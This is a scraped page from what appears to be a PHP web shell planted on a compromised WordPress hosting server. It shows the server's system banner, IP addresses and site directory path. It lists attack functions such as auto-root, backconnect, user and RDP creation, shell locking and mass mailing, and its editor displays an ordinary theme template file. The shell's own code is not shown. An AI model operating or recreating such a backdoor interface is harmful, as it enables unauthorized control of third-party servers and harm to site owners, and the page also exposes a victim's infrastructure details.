FreeBSD s15.mydevil.net 14.1-RELEASE-p4 FreeBSD 14.1-RELEASE-p4 #3 releng/14.1-n267709-86d01789bf41-dirty: Thu Sep 5 04:26:54 CEST 2024 root@pkg1.admin.net.pl:/usr/obj/usr/src/amd64.amd64/sys/devil amd64
Apache/N-G-I-N-X-htaccess-support
: 128.204.218.142 | : 3.22.241.15
Cant Read [ /etc/named.conf ]
?8.1.30
art
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
home /
art /
domains /
rotarycup.pl /
public_html /
wp-content /
themes /
sportcenter /
tribe-events /
list /
[ HOME SHELL ]
Name
Size
Permission
Action
single-event.php
4.46
KB
-rw-r--r--
single-featured.php
4.46
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : single-event.php
<?php /** * List View Single Event * This file contains one event in the list view * * Override this template in your own theme by creating a file at [your-theme]/tribe-events/list/single-event.php * * @package TribeEventsCalendar * */ if ( ! defined( 'ABSPATH' ) ) { die( '-1' ); } // Setup an array of venue details for use later in the template $venue_details = tribe_get_venue_details(); // Venue $has_venue_address = ( ! empty( $venue_details['address'] ) ) ? ' location' : ''; // Organizer $organizer = tribe_get_organizer(); ?> <div class="event-carousel-item event-item"> <div class="event-item-inner"> <div class="event-item-thumbnail"> <a href="<?php echo esc_url( tribe_get_event_link() ); ?>" title="<?php the_title_attribute(); ?>" > <?php if(has_post_thumbnail()){ $thumbnail = wp_get_attachment_image_src(get_post_thumbnail_id(get_the_ID()),'leaf_thumb_524x366', true); }else{ $thumbnail = leaf_print_default_thumbnail(); }?> <img src="<?php echo esc_url($thumbnail[0]) ?>" width="<?php echo esc_attr($thumbnail[1]) ?>" height="<?php echo esc_attr($thumbnail[2]) ?>" title="<?php the_title_attribute(); ?>" alt="<?php the_title_attribute(); ?>"> <?php if(class_exists('Tribe__Events__Main')){ $startdate = get_post_meta(get_the_ID(), '_EventStartDate', true); if($startdate){ $con_date = new DateTime($startdate); $month = $con_date->format('M'); $day = $con_date->format('d'); $year = $con_date->format('Y'); } ?> <div class="event-date-block font-2 main-color-1-bg text-center"> <div class="day"><?php echo esc_html($day); ?></div> <div class="month"><?php echo date_i18n( 'M', strtotime( $startdate ) ); ?></div> <div class="year" style="display:none"><?php echo date_i18n( 'Y', strtotime( $startdate ) ); ?></div> </div> <?php }?> </a> </div> <?php do_action( 'tribe_events_before_the_content' ) ?> <div class="event-item-content"> <a class="btn skew-btn btn-primary has-icon event-button" href="<?php echo esc_url( tribe_get_event_link() ); ?>"> <?php if(class_exists('Tribe__Events__Main')){?> <span class="btn-text"> <?php esc_html_e('Join Now', 'sportcenter'); ?> <?php echo tribe_get_cost( null, true )?' - '.tribe_get_cost( null, true ):''; ?> </span> <?php }else{?> <span class="btn-text"><?php esc_html_e('Read More', 'sportcenter'); ?></span> <?php }?> <span class="btn-icon"><i class="fa fa-chevron-right"></i></span> </a> <?php do_action( 'tribe_events_before_the_event_title' ) ?> <h3 class="event-title font-2"><a href="<?php echo esc_url( tribe_get_event_link() ); ?>" title="<?php the_title_attribute() ?>"><?php the_title(); ?></a></h3> <?php do_action( 'tribe_events_after_the_event_title' ) ?> <div class="event-meta small-meta"> <?php if(class_exists('Tribe__Events__Main')){?> <div><i class="fa fa-clock-o"></i><?php echo tribe_events_event_schedule_details(); ?></div> <?php if (tribe_get_venue() || tribe_get_address()){ ?> <div class="venue-details"> <i class="fa fa-map-marker"></i><?php echo tribe_get_venue()?tribe_get_venue():tribe_get_address(); ?> </div> <?php } ?> <?php }else{ ?> <div><?php echo esc_html__('By ','sportcenter').get_the_author(); ?></div> <div><?php esc_html_e('At ','sportcenter'); the_time( get_option( 'time_format' ) ); ?></div> <?php }?> </div> <div class="event-excerpt"><?php echo tribe_events_get_the_excerpt( null, wp_kses_allowed_html( 'post' ) ); ?></div> </div> <?php do_action( 'tribe_events_after_the_content' );?> </div><!--inner--> </div><!--/event-carousel-item-->
Close